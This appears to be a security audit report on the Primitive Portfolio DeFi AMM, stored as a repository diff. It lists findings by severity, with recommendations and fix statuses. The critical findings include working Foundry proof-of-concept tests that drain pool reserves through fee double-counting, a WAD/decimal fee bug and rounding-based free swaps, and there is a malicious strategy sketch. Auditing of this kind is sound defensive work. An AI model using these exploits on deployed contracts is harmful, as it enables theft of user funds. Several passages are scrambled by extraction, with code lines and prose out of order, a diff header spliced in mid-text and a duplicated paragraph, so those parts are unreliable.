", sellAsset); { bool swapExecuted = _fuzz_random_args(sellAsset, amtIn, amtOut); if (!swapExecuted) return; // not interesting to check swap if it didn't execute } pool = ghost().pool(); (uint256 postXPerL, uint256 postYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log("x_end: ", postXPerL); console.log("y_end: ", postYPerL); } string[] memory cmds = new string[](18); cmds[0] cmds[1] cmds[2] cmds[3] cmds[4] = "python3"; = "../primitive-math-venv/primitive-sim/check_swap_result.py"; = "--x"; = vm.toString(preXPerL); = "--y"; 12 = vm.toString(preYPerL); = "--strike"; = vm.toString(tv.strike); = "--vol_bps"; = vm.toString(tv.volatility_bps); cmds[5] cmds[6] cmds[7] cmds[8] cmds[9] cmds[10] = "--duration"; cmds[11] = vm.toString(tv.durationSeconds); cmds[12] = "--ttm"; cmds[13] = vm.toString(tv.ttm); cmds[14] = "--xprime"; cmds[15] = vm.toString(postXPerL); cmds[16] = "--yprime"; cmds[17] = vm.toString(postYPerL); bytes memory result = vm.ffi(cmds); (uint256 idealFinalYPerL) = abi.decode(result, (uint256)); if (printLogs) console.log("idealFinalYPerL: ", idealFinalYPerL); // Only worried if swap was _better_ than ideal if (idealFinalYPerL > postYPerL) { uint256 diff = idealFinalYPerL - postYPerL; uint256 percentErrWad = diff * 1e18 / idealFinalYPerL; if (printLogs) console.log("%% err wad: ", percentErrWad); // assert at worst 25% error assertLt(percentErrWad, 0.25 * 1e18); } } } Recommendation: Do more thorough numerical testing to determine under what conditions swap pricing deviates from "ideal" and whether this is a practical concern. Spearbit: No comment. Marking as acknowledged. +5.3.2 getMaxOrder overestimates output values Severity: Low Risk Context: NormalStrategy.sol#L230-L237 Description: The getMaxOrder function adds + 1 to the output value, overestimating the output value. This can lead to failed swaps if this value is used. tempOutput = pool.virtualY - lowerY.mulWadDown(pool.liquidity) + 1; also easy It's erY.mulWadDown(pool.liquidity) + 1 = pool.virtualY + 1, more than the pool reserves. that with lowerY = 0 we see to have i.e., tempOutput = pool.virtualY - low- the max out amount would be Recommendation: Consider subtracting 1 instead of adding 1. Primitive: Fixed in commit f0b6d4. Spearbit: Fixed. 13 +5.3.3 Improve reentrancy guards Severity: Low Risk Context: Portfolio.sol#L124 Description: Previously, only settlement performed calls to arbitrary addresses through ERC20 transfers. With recent additions, like the ERC1155._mint and user-provided strategies, single actions like allocate and swap also perform calls to potentially malicious contracts. This increases the attack surface for reentrancy attacks. The current way of protecting against reentrancy works by setting multicall flags (_currentMulticall) and locks (preLock() and postLock()) on multicalls and single-action calls. However, the single calls essentially skip reen- trancy guards if the outer context is a multicall. This still allows for reentrancy through control flows like the following: // reenter during multicall's action execution multicall preLock() singleCall() reenter during current execution singeCall() preLock(): passes because we're in multicall skips settlement postLock(): passes because we're in multicall _currentMulticall = false; settlement() postLock() // reenter during multicall's settlement multicall preLock() singleCall preLock(): ... 
postLock(): `_locked = 1` _currentMulticall = false; settlement() reenter singleCall() passes preLock because not locked multiCall() passes multicall reentrancy guard because not in multicall passes preLock because not locked ... settlement finishes postLock() Recommendation: While it's not obvious how to exploit the reentrancy issues, we propose improving the reentrancy guards. The main issue is that the current reentrancy lock has no "depth information": it does not know if an action that is run during a multicall execution is part of the originally scheduled multicall actions or an injected one. By adjusting the _locked field to count the reentrancy call depth (instead of resetting it on any _preLock/_postLock), we can ensure that only the originally defined multicall actions are run. function _preLock() private { - if (_locked != 1 && !_currentMulticall) { - revert Portfolio_InvalidReentrancy(); - } + // if it has been locked before: `_locked != 1` + // revert if not in a multicall: `!_currentMulticall` (singleCall -> singleCall reentrancy) + // or revert if in a multicall and this was called from another singleCall: `_locked > 2` (multiCall -> singleCall -> singleCall reentrancy) + if (_locked != 1 && (!_currentMulticall || _locked > 2)) { + revert Portfolio_InvalidReentrancy(); + } - _locked = 2; + _locked++; } function _postLock() private { - _locked = 1; + _locked--; // Reverts if the account system was not settled after a normal call. if (!__account__.settled && !_currentMulticall) { revert Portfolio_InvalidSettlement(); } } Note that after a successful transaction, the _locked field is reset to its original value, as each _preLock has a single corresponding _postLock, and vice versa. Primitive: Fixed in commit 4bf82d. Spearbit: Fixed. Recommendation was implemented. 5.4 Gas Optimization +5.4.1 approximatePriceGivenX does not need to compute y-bounds Severity: Gas Optimization Context: NormalStrategyLib.sol#L308 Description: The approximatePriceGivenX function does not need to compute the y-bounds by calling self.getReserveYBounds(). Recommendation: Consider removing this call. Primitive: Fixed in commit f994c2. Spearbit: Fixed. +5.4.2 Unnecessary computations in NormalStrategy.beforeSwap Severity: Gas Optimization Context: NormalStrategy.sol#L87 Description: The NormalStrategy.beforeSwap function calls getSwapInvariants to simulate an entire swap with current and post-swap invariants. However, only the current invariant value is used. Recommendation: Consider calculating only the current invariant instead of calling getSwapInvariants. This also eliminates having to create a fake order with an input and output of 2 to make the swap simulation pass. The invariant computation should use the same rounding as done in getSwapInvariants. Primitive: Fixed in commit a39126. Spearbit: Fixed. 5.5 Informational +5.5.1 Pools can use malicious strategies Severity: Informational Context: Portfolio.sol#L671 Description: Anyone can create pools and configure the pool to use a custom strategy. A malicious strategy can disable swapping and (de-)allocating at any time, as well as enable privileged parties to trade out all pool reserves, by implementing custom logic in the validateSwap function. Recommendation: When users trade or provide liquidity in unofficial strategies, they risk losing their funds. Users should thoroughly check the strategy of the pool before engaging with it. Primitive: Fixed in commit acb0cf. They were in the right place in createPool, but the function arguments for encode were in the wrong place, so I switched them around. Also added tests for all the combinations. Spearbit: Acknowledged.
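To make the risk described in 5.5.1 concrete, below is a minimal sketch of such a strategy; the validateSwap signature is simplified for illustration and does not match the exact Portfolio strategy interface:

contract MaliciousStrategy {
    address private immutable owner = msg.sender;
    bool public tradingEnabled; // the deployer can flip this at any time

    function setTradingEnabled(bool enabled) external {
        require(msg.sender == owner, "not owner");
        tradingEnabled = enabled;
    }

    // simplified stand-in for the hook the pool consults before a swap:
    // everyone else's swaps can be disabled while the deployer always passes
    function validateSwap(address swapper) external view returns (bool) {
        return swapper == owner || tradingEnabled;
    }
}

A pool wired to such a strategy looks functional until the deployer flips the switch, which is why the recommendation advises checking the strategy code before engaging with a pool.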
+5.5.2 findRootForSwappingIn functions should use MINIMUM_INVARIANT_DELTA Severity: Informational Context: NormalStrategyLib.sol#L654, NormalStrategy.sol#L11 Description: The findRootForSwappingInX and findRootForSwappingInY functions add + 1 to the previous curve invariant: tradingFunction(curve) - (curve.invariant + 1) Recommendation: Instead of adding + 1, consider adding + MINIMUM_INVARIANT_DELTA. Finding a root for this function then yields the desired output of finding curve values such that newInvar - (prevInvar + delta) >= 0, i.e. newInvar - prevInvar - delta >= 0, i.e. newInvar - prevInvar >= delta. This matches the swap invariant check in _validateSwap. Primitive: Fixed in commit 973230. Spearbit: Fixed. +5.5.3 Unused Errors Severity: Informational Context: NormalStrategyLib.sol#L48-L49 Description: The NormalStrategyLib_UpperPriceLimitReached and NormalStrategyLib_LowerPriceLimitReached errors are not used. Recommendation: Consider using these errors or removing them. Primitive: Fixed in commit 3bd709. Spearbit: Fixed. +5.5.4 getSwapInvariants order output can be 1 instead of 2 Severity: Informational Context: NormalStrategy.sol#L91, NormalStrategy.sol#L180, SwapLib.sol#L133 Description: The getSwapInvariants function is used to simulate swaps for the getAmountOut and beforeSwap functions. These functions use an artificial output value of 2 such that the function does not revert. Recommendation: The output value can be reduced to 1, as there is no fee on the output value and the only check on the output reserves is that they changed. Primitive: Fixed in commit 797457. This was then adjusted to remove the unnecessary computations in getSwapInvariant: commit a39126. Spearbit: Fixed in beforeSwap because the calls changed; fixed in getAmountOut. +5.5.5 AfterCreate event uses wrong durationSeconds value if pool is perpetual Severity: Informational Context: NormalStrategy.sol#L74, NormalStrategyLib.sol#L408 Description: The AfterCreate event uses the cached config.durationSeconds value, but the real value the config storage struct is initialized with will be SECONDS_PER_YEAR in the case of perpetual pools. Recommendation: Consider reading the durationSeconds value from the config storage variable configs[poolId] instead. Primitive: Fixed in commit 8e645a. Spearbit: Fixed. +5.5.6 Unnecessary fee reserves check Severity: Informational Context: SwapLib.sol#L119 Description: The fee amount is always taken on the input, and the fee percentage is always less than 100%. Therefore, the fee is always less than the input. The following check should never fail: adjustedInputReserveWad += self.input; // feeAmountUnit <= self.input <= adjustedInputReserveWad if (feeAmountUnit > adjustedInputReserveWad) revert SwapLib_FeeTooHigh(); Recommendation: Consider removing the check and adding a comment instead, explaining why the fee is always included in the adjusted reserve and the subtraction doesn't underflow. Primitive: Fixed in commit 728b04. Spearbit: Fixed.
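For reference, the bound argued in 5.5.6 can be written out as a small self-contained sketch; feeBps and the 10_000 denominator are illustrative stand-ins for the actual fee representation in SwapLib:

function adjustedReserveAfterFee(uint256 reserveBefore, uint256 input, uint256 feeBps) pure returns (uint256) {
    // feeBps < 10_000, so feeAmountUnit <= input
    uint256 feeAmountUnit = (input * feeBps) / 10_000;
    // the full input (fee included) has already been added to the reserve
    uint256 adjustedInputReserveWad = reserveBefore + input;
    // hence feeAmountUnit <= input <= adjustedInputReserveWad: cannot underflow
    return adjustedInputReserveWad - feeAmountUnit;
}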
diff --git a/findings_newupdate/spearbit/Primitive-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Primitive-Spearbit-Security-Review.txt new file mode 100644 index 0000000..1d843da --- /dev/null +++ b/findings_newupdate/spearbit/Primitive-Spearbit-Security-Review.txt @@ -0,0 +1,38 @@ +5.1.1 Protocol fees are double-counted as registry balance and pool reserve Severity: Critical Risk Context: Portfolio.sol#L489-L507 Description: When swapping, the registry is credited a protocolFee. However, this fee is always reinvested in the pool, meaning the virtualX or virtualY pool reserves per liquidity increase by protocolFee / liquidity. The protocol fee is now double-counted as the registry's user balance and the pool reserve, while the global reserves are only increased by the protocol fee once in _increaseReserves(_state.tokenInput, iteration.input). A protocol fee breaks the invariant that the global reserve should be greater than the sum of user balances and fees plus the sum of pool reserves. As the protocol fee is reinvested, LPs can withdraw it. If users and LPs decide to withdraw all their balances, the registry can't withdraw its fees anymore. Conversely, if the registry withdraws the protocol fee, not all users can withdraw their balances anymore. // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import "./Setup.sol"; import "forge-std/console2.sol"; contract TestSpearbit is Setup { function test_protocol_fee_reinvestment() public noJit defaultConfig useActor usePairTokens(100e18) allocateSome(10e18) // deltaLiquidity isArmed { // Set fee, 1/5 = 20% SimpleRegistry(subjects().registry).setFee(address(subject()), 5); // swap // make invariant go negative s.t. all fees are reinvested, not strictly necessary vm.warp(block.timestamp + 1 days); uint128 amtIn = 1e18; bool sellAsset = true; uint128 amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)); subject().multiprocess(FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0))); // deallocate and earn reinvested LP fees + protocol fees, emptying the _entire_ reserve including protocol fees subject().multiprocess( FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: false, useMax: uint8(1), poolId: ghost().poolId, deltaLiquidity: 0 // useMax will set this to freeLiquidity }) ); subject().draw(ghost().asset().to_addr(), type(uint256).max, actor()); uint256 protocol_fee = ghost().balance(subjects().registry, ghost().asset().to_addr()); assertEq(protocol_fee, amtIn / 100 / 5); // 20% of 1% of 1e18 // the global reserve is 0 even though the protocol fee should still exist uint256 reserve_asset = ghost().reserve(ghost().asset().to_addr()); assertEq(reserve_asset, 0); // reverts with InsufficientReserve(0, 2000000000000000) SimpleRegistry(subjects().registry).claimFee( address(subject()), ghost().asset().to_addr(), protocol_fee, address(this) ); } } Recommendation: To avoid double-counting, the protocol fee should not be reinvested in the pool if it is credited to the registry, for both the invariant >= 0 and invariant < 0 cases. It must be removed from deltaInput and deltaInputLessFee when computing the next virtualX / virtualY candidates: // pseudo-code nextIndependent = liveIndependent + (deltaInput - protocolFee).divWadDown(iteration.liquidity); // deltaInputLessFee still includes the protocolFee, only the LP fee was removed. nextIndependentLessFee = liveIndependent + (deltaInputLessFee - protocolFee).divWadDown(iteration.liquidity); Primitive: Fixed in PR 335.
Spearbit: The fix implements the recommendation. +5.1.2 LP fees are in WAD instead of token decimal units Severity: Critical Risk Context: Portfolio.sol#L485 Description: When swapping, deltaInput is in WAD (not token decimals) units. Therefore, feeAmount is also in WAD as a percentage of deltaInput. When calling _feeSavingEffects(args.poolId, iteration) to determine whether to reinvest the fees in the pool or earmark them for LPs, a _syncFeeGrowthAccumulator is done with the following parameter: _syncFeeGrowthAccumulator(FixedPointMathLib.divWadDown(iteration.feeAmount, iteration.liquidity)) This is a WAD-per-liquidity value stored in _state.feeGrowthGlobal and also in pool.feeGrowthGlobalAsset through a subsequent _syncPool call. If an LP claims now and their fees are synced with syncPositionFees, their tokensOwed is set to: uint256 differenceAsset = AssemblyLib.computeCheckpointDistance( pool.feeGrowthGlobalAsset /* feeGrowthAsset */, self.feeGrowthAssetLast ); feeAssetEarned = FixedPointMathLib.mulWadDown(differenceAsset, self.freeLiquidity); self.tokensOwedAsset += SafeCastLib.safeCastTo128(feeAssetEarned); Then tokensOwedAsset is increased by a WAD value (WAD per WAD liquidity multiplied by WAD liquidity), and they are credited this WAD value with _applyCredit(msg.sender, asset, claimedAssets), which they can then withdraw as a token decimal value. The result is that LP fees are credited and can be withdrawn as WAD units, and tokens with fewer than 18 decimals can be stolen from the protocol. // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import "./Setup.sol"; import "forge-std/console2.sol"; contract TestSpearbit is Setup { function test_fee_decimal_bug() public sixDecimalQuoteConfig useActor usePairTokens(31e18) allocateSome(100e18) // deltaLiquidity isArmed { // Understand current pool values. create pair initializes from price // DEFAULT_STRIKE=10e18 = 10.0 quote per asset = 1e7/1e18 = 1e-11 uint256 reserve_asset = ghost().reserve(ghost().asset().to_addr()); uint256 reserve_quote = ghost().reserve(ghost().quote().to_addr()); assertEq(reserve_asset, 30.859596948332370800e18); assertEq(reserve_quote, 308.595965e6); // Do swap from quote -> asset, so we catch fee on quote bool sellAsset = false; // amtIn is in quote. gets scaled to WAD in `_swap`. uint128 amtIn = 100; // 0.0001$ ~ 1e14 iteration.input uint128 amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)); { // verify that before swap, we have no credit uint256 credited = ghost().balance(actor(), ghost().quote().to_addr()); assertEq(credited, 0, "token-credit"); } uint256 pre_swap_balance = ghost().quote().to_token().balanceOf(actor()); subject().multiprocess( FVMLib.encodeSwap( uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0) ) );
subject().multiprocess( // claim it all FVMLib.encodeClaim(ghost().poolId, type(uint128).max, type(uint128).max) ); // we got credited tokensOwed = 1% of 1e14 input = 1e12 quote tokens uint256 credited = ghost().balance(actor(), ghost().quote().to_addr()); assertEq(credited, 1e12, "tokens-owed"); // can withdraw the credited tokens, would underflow reserve, so just rug the entire reserve reserve_quote = ghost().reserve(ghost().quote().to_addr()); subject().draw(ghost().quote().to_addr(), reserve_quote, actor()); uint256 post_draw_balance = ghost().quote().to_token().balanceOf(actor()); // -amtIn because reserve_quote already got increased by it, otherwise we'd be double-counting assertEq(post_draw_balance, pre_swap_balance + reserve_quote - amtIn, "post-draw-balance-mismatch"); } } Recommendation: Generally, some quantities are in WAD units and some in token decimals throughout the protocol. We recommend using WAD units everywhere and only converting from/to token decimal units at the "token boundary", directly at the point of interaction with the token contract through a transfer/transferFrom/balanceOf call. Primitive: Resolved in PR 320. Spearbit: Fixed. +5.1.3 Swaps can be done for free and steal the reserve given large liquidity allocation Severity: Critical Risk Context: Portfolio.sol#L509 Description: A swap of inputDelta tokens for outputDelta tokens is accepted if the invariant after the swap did not decrease. The after-swap invariant is recomputed using the pool's new virtual reserves (per liquidity) virtualX and virtualY: // becomes virtualX (reserveX) if swapping X -> Y nextIndependent = liveIndependent + deltaInput.divWadDown(iteration.liquidity); // becomes virtualY (reserveY) if swapping X -> Y nextDependent = liveDependent - deltaOutput.divWadDown(iteration.liquidity); // in checkInvariant int256 nextInvariant = RMM01Lib.invariantOf({ self: pools[poolId], R_x: reserveX, R_y: reserveY, timeRemainingSec: tau }); require(nextInvariantWad >= prevInvariant); When iteration.liquidity is sufficiently large, the integer division deltaOutput.divWadDown(iteration.liquidity) will return 0, resulting in an unchanged pool reserve instead of a decreased one. The invariant check will pass even without transferring any input amount deltaInput, as the reserves are unchanged. The swapper will be credited deltaOutput tokens. The attacker first needs to increase the liquidity to a large amount (> 2**126 in the POC) such that they can steal the entire asset reserve (100e18 asset tokens in the POC). This can be done using multiprocess to: 1. allocate > 1.1e38 liquidity. 2. swap with input = 1 (to avoid the 0-swap revert) and output = 100e18. The new virtualX asset will be computed as liveDependent - deltaOutput.divWadDown(iteration.liquidity) = liveDependent - 100e18 * 1e18 / 1.1e38 = liveDependent - 0 = liveDependent, leaving the virtual pool reserves unchanged and passing the invariant check. This credits 100e18 to the attacker when settled, as the global reserves (__account__.reserve) are decreased (but not the actual contract balance). 3. deallocate the > 1.1e38 free liquidity again. As the virtual pool reserves virtualX/Y remained unchanged throughout the swap, the same allocated amount is credited again. Therefore, the allocation / deallocation doesn't require any token settlement. 4. settlement is called; the attacker needs to pay the swap input amount of 1 wei and is credited the global reserve decrease of 100e18 assets from the swap. Note that this attack requires a JIT parameter of zero in order to deallocate in the same block as the allocation. However, given sufficient capital combined with an extreme strike price or future cross-block flashloans, this attack
Note that this attack requires a JIT parameter of zero in order to deallocate in the same block as the allocation. However, given sufficient capital combined with an extreme strike price or future cross-block flashloans, this attack 8 is also possible with JIT > 0. Attackers can perform this attack in their own pool with one malicious token and one token they want to steal. The malicious token comes with functionality to disable anyone else from trading so the attacker is the only one who can interact with their custom pool. This reduces any risk of this attack while waiting for the deallocation in a future block. // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import "./Setup.sol"; import "contracts/libraries/RMM01Lib.sol"; import "forge-std/console2.sol"; contract TestSpearbit is Setup { using RMM01Lib for PortfolioPool; // sorry, didn't know how to use the modifiers for testing 2 actors at the same time function test_virtual_reserve_unchanged_bug() public noJit defaultConfig { /////// SETUP /////// uint256 initialBalance = 100 * 1e18; address victim = address(actor()); vm.startPrank(victim); // we want to steal the victim's asset ghost().asset().prepare(address(victim), address(subject()), initialBalance); subject().fund(ghost().asset().to_addr(), initialBalance); vm.stopPrank(); // we need to prepare a tiny quote balance for attacker because we cannot set input = 0 for a swap ,! address attacker = address(0x54321); addGhostActor(attacker); setGhostActor(attacker); vm.startPrank(attacker); ghost().quote().prepare(address(attacker), address(subject()), 2); vm.stopPrank(); uint256 maxVirtual; { // get the virtualX/Y from pool creation PortfolioPool memory pool = ghost().pool(); (uint256 x, uint256 y) = pool.getVirtualPoolReservesPerLiquidityInWad(); console2.log("getVirtualPoolReservesPerLiquidityInWad: %s \t %y \t %s", x, y); maxVirtual = y; } /////// ATTACK /////// // attacker provides max liquidity, swaps for free, removes liquidity, is credited funds vm.startPrank(attacker); bool sellAsset = false; uint128 amtIn = 1; uint128 amtOut = uint128(initialBalance); // victim's funds bytes[] memory instructions = new bytes[](3); uint8 counter = 0; instructions[counter++] = FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: true, useMax: uint8(0), poolId: ghost().poolId, // getPoolLiquidityDeltas(int128 deltaLiquidity) does virtualY.mulDivUp(delta, scaleDownFactorAsset).safeCastTo128() ,! // virtualY * deltaLiquidity / 1e18 <= uint128.max => deltaLiquidity <= uint128.max * 1e18 ,! / virtualY. 9 // this will end up supplying deltaLiquidity such that the uint128 cast on deltaQuote won't overflow (deltaQuote ~ uint128.max) ,! // deltaLiquidity = 110267925102637245726655874254617279807 > 2**126 deltaLiquidity: uint128((uint256(type(uint128).max) * 1e18) / maxVirtual) }); // the main issue is that the invariant doesn't change, so the checkInvariant passes // the reason why the invariant doesn't change is because the virtualX/Y doesn't change // the reason why virtualY doesn't change even though we have deltaOutput = initialBalance (100e18) ,! // is that the previous allocate increased the liquidity so much that: // nextDependent = liveDependent - deltaOutput.divWadDown(iteration.liquidity) = liveDependent // the deltaOutput.divWadDown(iteration.liquidity) is 0 because: // 100e18 * 1e18 / 110267925102637245726655874254617279807 = 1e38 / 1.1e38 = 0 instructions[counter++] = FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0)); ,! 
instructions[counter++] = FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: false, useMax: uint8(1), poolId: ghost().poolId, deltaLiquidity: 0 // useMax makes us deallocate our entire freeLiquidity }); subject().multiprocess(FVM.encodeJumpInstruction(instructions)); uint256 attacker_asset_balance = ghost().balance(attacker, ghost().asset().to_addr()); assertGt(attacker_asset_balance, 0); console2.log("attacker asset profit: %s", attacker_asset_balance); // attacker can withdraw victim's funds, leaving victim unable to withdraw subject().draw(ghost().asset().to_addr(), type(uint256).max, actor()); uint256 attacker_balance = ghost().asset().to_token().balanceOf(actor()); // rounding error of 1 assertEq(attacker_balance, initialBalance - 1, "attacker-post-draw-balance-mismatch"); vm.stopPrank(); } } Recommendation: Note that in the swap step the virtualX and virtualY pool reserves are intentionally chosen to remain unchanged, but the global reserves (__account__.reserve) decrease. The sum of the on-protocol user balances is now greater than the actual global reserves that can be withdrawn. The attacker can withdraw first, and LPs will incur the loss, unable to withdraw their on-protocol balance. This is a general problem with the protocol, as a single issue in one pool spills over to all pools and user credit balances. The pool's actual reserves are not siloed; they are not even tracked (only indirectly through pool.liquidity * pool.virtualX / 1e18). This risk is further enhanced as pool creation is permissionless and allows attacker-controlled malicious tokens. Think about possible ways to silo the pool risk. This problem stems from the fact that the global reserves are tracked in token units while the pool reserves are tracked only indirectly, as pool reserves per liquidity with virtualX/Y. These are completely different scales, and they can drift apart by orders of magnitude over time, leading to the attack. This can easily be seen when looking at allocate: it increases the global reserve with increaseReserve but doesn't touch the virtualX/Y pool reserves per liquidity at all. What should ideally happen in a swap is that the global reserves increase/decrease by the exact same amounts the pool reserves increase/decrease. Currently, the global reserves are changed by _increaseReserves(_state.tokenInput, iteration.input) and _decreaseReserves(_state.tokenOutput, iteration.output), but this is decoupled from the actual pool reserve changes, as can be seen from the attack. (The pool reserves don't change at all because liquidity's magnitude is not in any way proportional to virtualX; the reconstructed pool reserves virtualX * pool.liquidity / 1e18 don't change in the swap attack.) A proper fix would be to resolve this discrepancy in global and pool reserve changes. This can be achieved by tracking the pool reserves in the same units as the global reserves, instead of tracking a reserves-per-liquidity value. Instead of a virtualX reserve per liquidity, one would store reserveX in token decimals (or WADs).
_increaseReserves(_state.tokenInput, iteration.input); _decreaseReserves(_state.tokenOutput, iteration.output); _syncPool( args.poolId, state.tokenInput iteration.input, // increases pool reserve by the same amount as global reserves now state.tokenOutput iteration.output, // decreases pool reserve by the same amount as global reserves now ... ); // we can be much more confident that the swap only traded out an amount that was actually in the pool ,! reserves Now, with global and pool reserves decreasing by the same amount, we can be much more confident that the pools are properly siloed, a swap can only pay out what was actually allocated to the pool. One should also be able to prove important invariants now, like global reserves >= sum of pool reserves + sum of user balances + sum of tokens owed, which was violated by all critical attacks. The only issue is that this is a non-trivial change, every time virtualX is used in the current code, it needs to be re- computed as pool.reserveX * 1e18 / pool.liquidity (or with an even higher precision than 1e18). One would also need to change the pool reserves in allocate / deallocate along the global reserve increase/decrease. The biggest change will probably be rewriting the getLiquidityDeltas function, especially the first liquidity provision when liquidity == 0 and the start price. There might be other issues that come with this (the standard ERC4626 first depositor issue, etc.) but it seems like the proper way to be sure the pool reserves remain consistent with global reserves. Might be worth exploring where these changes lead and what potential new issues arise. Spearbit: Marking as Acknowledged, as this leads to the extension period. 5.2 High Risk +5.2.1 Unsafe type-casting Severity: High Risk Context: See below Description: Throughout the contract we’ve encountered various unsafe type-castings. • invariant Within the _swap function, the next invariant is a int256 variable and is calculated within the checkInvariant function implemented in the RMM01Portfolio. This variable then is dangerously typecasted to int128 and assigned to a int256 variable in the iteration struct (L539). The down-casting from int256 to int128 assumes that the nextInvariantWad fits in a int128, in case it won’t fit, it will overflow. The updated iteration object is passed to the _feeSavingEffects function, which based on the RMM implementation can lead to bad consequences. • iteration.nextInvariant • _getLatestInvariantAndVirtualPrice • getNetBalance During account settlement, getNetBalance is called to compute the difference between the "physical reserves" (contract balance) and the internal reserves: net = int256(physicalBalance) - int256(internalBalance). If the internalBalance > int256.max, it overflows into a negative value and the attacker is credited the entire physical balance + overflow upon settlement (and doesn’t have to pay anything in settle). This might happen if an attacker allocates or swaps in very high amounts before settlement is called. Consider doing a safe typecast here as a legitimate possible revert would cause less issues than an actual overflow. • getNetBalance 11 • Encoding / Decoding functions The encoding and decoding functions in FVMLib perform many unsafe typecasts and will truncate values. This can result in a user calling functions with unexpected parameters if they use a custom encoding. Consider using safe type-casts here. 
• encodeJumpInstruction: cannot encode more than 255 instructions, instructions will be cut off and they might perform an action that will then be settled unfavorably. • decodeClaim: fee0/fee1 can overflow • decodeCreatePool: price := mul(base1, exp(10, power1)) can overflow and pool is initialized wrong • decodeAllocateOrDeallocate: deltaLiquidity := mul(base, exp(10, power)) can overflow would pro- vide less liquidity • decodeSwap: input / output := mul(base1, exp(10, power1)) can overflow, potentially lead to unfavor- able swaps • Other • PortfolioLib.getPoolReserves: int128(self.liquidity). This could be a safe typecast, the function is not used internally. • AssemblyLib.toAmount: The typecast works if power < 39, otherwise leads to wrong results without revert- ing. This function is not used yet but consider performing a safe typecast here. Recommendation: We recommend using safe type-casts that check if the value fits into the new type’s range as the default. For the invariant down-cast to int128, it is unclear why it is needed as all computations involving invariants are performed on int256 anyways, the only discrepancy being in the Swap event. Consider removing the down-casting as all of the logic deals with int256. Spearbit: Marked as Acknowledged. PR 307 fixed some unsafe typecasts in the decoding but not all. The length and subsequent shift computations can still underflow for bad/malicious encodings. Underflows in decod- ings shouldn’t be as severe though because honest users should use the provided encoding functions. PR 321 addresses the rest. +5.2.2 Protocol fees are in WAD instead of token decimal units Severity: High Risk Context: Portfolio.sol#L489 Description: When swapping, deltaInput is in WAD (not token decimals) units. Therefore, the protocolFee will also be in WAD as a percentage of deltaInput. This WAD amount is then credited to the REGISTRY: iteration.feeAmount = (deltaInput * _state.fee) / PERCENTAGE; if (_protocolFee != 0) { uint256 protocolFeeAmount = iteration.feeAmount / _protocolFee; iteration.feeAmount -= protocolFeeAmount; _applyCredit(REGISTRY, _state.tokenInput, protocolFeeAmount); } The privileged registry can claim these fees using a withdrawal (draw) and the WAD units are not scaled back to token decimal units, resulting in withdrawing more fees than they should have received if the token has less than 18 decimals. This will reduce the global reserve by the increased fee amount and break the accounting and functionality of all pools using the token. Recommendation: Generally, some quantities are in WAD units and some in token decimals throughout the pro- tocol. We recommend using WAD units everywhere and only converting from/to token decimal units at the "token boundary", directly at the point of interaction with the token contract through a transfer/transferFrom/balanceOf call. 12 Primitive: Resolved in PR 335. Spearbit: Fixed. +5.2.3 Invariant.getX computation is wrong Severity: High Risk Context: solstat/Invariant.sol#L114-L140, RMM01Lib.sol#L70 Description: The protocol makes use of a solstat library to compute the off-chain swap amounts. The solstat’s Invariant.getX function documentation states: Computes x in x = 1 - Φ(Φ¹( (y + k) / K ) + στ). However, the y + k term should be y - k. The off-chain swap amounts computed via getAmountOut return wrong values. Using these values for an actual swap transaction will either (wrongly) revert the swap or overstate the output amounts. 
Derivation:

y = K · Φ(Φ⁻¹(1 - x) - σ√τ) + k
(y - k) / K = Φ(Φ⁻¹(1 - x) - σ√τ)
Φ⁻¹((y - k) / K) + σ√τ = Φ⁻¹(1 - x)
x = 1 - Φ(Φ⁻¹((y - k) / K) + σ√τ)

Recommendation: Change the comment and the computation to use y - k: /** * @notice Uses reserves `R_y` to compute reserves `R_x`. - * @dev Computes `x` in `x = 1 - Φ(Φ⁻¹( (y + k) / K ) + σ√τ)`. + * @dev Computes `x` in `x = 1 - Φ(Φ⁻¹( (y - k) / K ) + σ√τ)`. * Not used in invariant function. Used for computing swap outputs. * Simplifies to `1 - ( (y + k) / K )` when time to expiry is zero. * Reverts if `R_y` is greater than one. Units are WAD. * * Dangerous! There are important bounds to using this function. * * ... */ function getX(uint256 R_y, uint256 stk, uint256 vol, uint256 tau, int256 inv) internal pure returns (uint256 R_x) { // Short circuits because tau != 0 is more likely. if (tau != 0) { uint256 sec = tau.divWadDown(uint256(YEAR)); uint256 sdr = sec.sqrt(); sdr = sdr * uint256(HALF_SCALAR); sdr = vol.mulWadDown(sdr); - int256 phi = diviWad(int256(R_y) + inv, int256(stk)); + int256 phi = diviWad(int256(R_y) - inv, int256(stk)); ... } Consider adding more differential fuzz tests for the following scenarios: • invariant < 0 • invariant > 0 Primitive: Resolved in PR 32. Spearbit: Fixed. +5.2.4 Liquidity can be (de-)allocated at a bad price Severity: High Risk Context: Portfolio.sol#L295-L296 Description: To allocate liquidity to a pool, a single uint128 liquidityDelta parameter is specified. The required deltaAsset and deltaQuote token amounts are computed from the current virtualX and virtualY token reserves per liquidity (prices). An MEV searcher can sandwich the allocation transaction with swaps that move the price in an unfavorable way, such that the allocation happens at a time when the virtualX and virtualY variables are heavily skewed. The MEV searcher makes a profit, and the liquidity provider will automatically be forced to use undesired token amounts. In the provided test case, the MEV searcher makes a profit of 2.12e18 X, and the LP uses 9.08e18 X / 1.08 Y instead of the expected 3.08 X / 30.85 Y. LPs will incur a loss, especially if the asset (X) is currently far more valuable than the quote (Y).
